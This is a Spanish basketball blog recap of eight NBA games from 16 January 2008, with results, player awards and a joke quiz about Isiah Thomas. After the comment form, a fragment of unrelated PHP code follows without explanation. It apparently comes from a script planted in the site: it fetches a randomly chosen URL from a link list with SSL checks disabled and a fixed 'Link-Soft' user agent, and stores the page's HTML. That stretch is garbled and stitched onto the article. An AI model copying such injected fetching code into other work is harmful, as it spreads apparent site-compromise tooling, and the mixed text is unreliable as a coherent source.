La crónica (16/01/08)

17 de January de 2008 por MagicJohnson32

Noche de regresos, los de dos ilustres que sus respectivos equipos echaban de menos pero que, pese a completar notables actuaciones, no han podido evitar la derrota. Y en el caso de Miami, caer por 30 puntos en casa ante los Bulls pese a que O’Neal firmase uno de sus mejores partidos del año, suena a capitulación. 11 derrotas consecutivas acumulan los de Riley, que son el segundo peor equipo de toda la NBA. En los Kings regresó Bibby, que debutó esta temporada y fue uno de los mejores de su equipo en la derrota ante los Raptors, comandados por Bosh, Calderón y Delfino. En Charlotte, los Magic vieron como los locales remontaron 19 puntos con una gran actuación de Gerald Wallace y canastas decisivas de Jason Richardson. Similar fue lo ocurrido en Indiana, donde los Pacers vencieron tras ir 17 puntos por debajo gracias a un espectacular parcial de 24-46 en el último periodo. Los Celtics retomaron la senda de las victorias con 35 puntos de Allen y superaron a los Blazers en lo que supone la tercera derrota de los de Portland en los últimos 21 partidos. En New Jersey, Crawford dio el tercer triunfo seguido a los Knicks y motivó la tercera derrota consecutiva de los Nets..Los Hornets siguen luchando por el liderato del Oeste al sumar su 26º triunfo de la temporada anoche ante los Sonics, con dobles-dobles de sus tres estrellas, Paul, West y Chandler. Por último, los Bucks dieron otro paso en su camino hacia los Playoffs, que ya les queda a solo 2.5 partidos, gracias de nuevo a Andrew Bogut, clave en el resurgir de su equipo en este 2008.

Tras el resumen de la jornada, vamos con los detalles más destacados:

Resultados:

Bulls 126 – 96 Heat

Kings 91 – 116 Raptors

Magic 93 – 99 Bobcats

Warriors 117 – 125 Pacers

Knicks 111 – 105 Nets

Blazers 90 – 100 Celtics

Hawks 80 – 87 Bucks

Sonics 92 – 123 Hornets

geraldrashardNuestro MVP: Cada jornada hay varios jugadores que pueden optar al galardón. Hoy por ejemplo Chris Bosh, Dwight Howard o Jamaal Crawford podrían quejarse de la elección del MVP pero es que el partido de Gerald Wallace, con 36 puntos, 14 rebotes y 5 asistencias, y ayudando a su equipo a recuperar una diferencia de 19 puntos, es digno de premio.

El rookie de la noche: Hoy, sí. Éste el Kevin Durant que nos gusta ver. Un Durant no sólo centrado en tirar sin parar, sin escoger bien sus tiros y convertiéndose en ocasiones más en una lacra que en una ayuda. Excelente partido el suyo con 20 puntos, 7 rebotes, 6 asistencias y 9 de 15 en tiros.

La sorpresa: Desde el retorno de Mike Bibby con 19 puntos, hasta el gran partido de Josh Boone con 18 puntos y 12 rebotes, pasando por Matt Barnes, que ha acabado con 17 puntos, 9 rebotes y 6 asistencias… Varios jugadores han dado hoy un paso al frente, pero destacamos a Carlos Delfino que, con 26 puntos, 7 rebotes y 6 asistencias, se ha convertido en la sorpresa de la jornada.

La decepción: Cuando el líder del equipo falla todo se le hace más cuesta arriba a su equipo. Esta madrugada Joe Johnson ha protagonizado un partido horrible con 4 de 16 en tiros para acabar tan solo con 12 puntos. Sus compañeros no han podido suplirle y han acabado perdiendo frente a los Bucks.

natedavidleenetsPasatiempos: Adivine qué celebran Nate Robinson y David Lee

A) Que Nolan ha echado a Isiah Thomas

B) Que Isiah ha dimitido

C) Que Nolan ha echado a Isiah y después ha dimitido

D) Todas las anteriores

E) Un triple

Respuesta correcta: E, en realidad no había nada que celebrar.

Entre todos los acertantes se sorteará un vídeo con las mejores jugadas de Jerome James (a quien Isiah firmó un contrato de 5 años y 30 millones de dólares), incluyendo aquel día en el que James logró jugar más de 10 minutos sin que lo eliminasen por faltas.

Acabamos con las 10 mejores jugadas de los partidos disputados anoche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>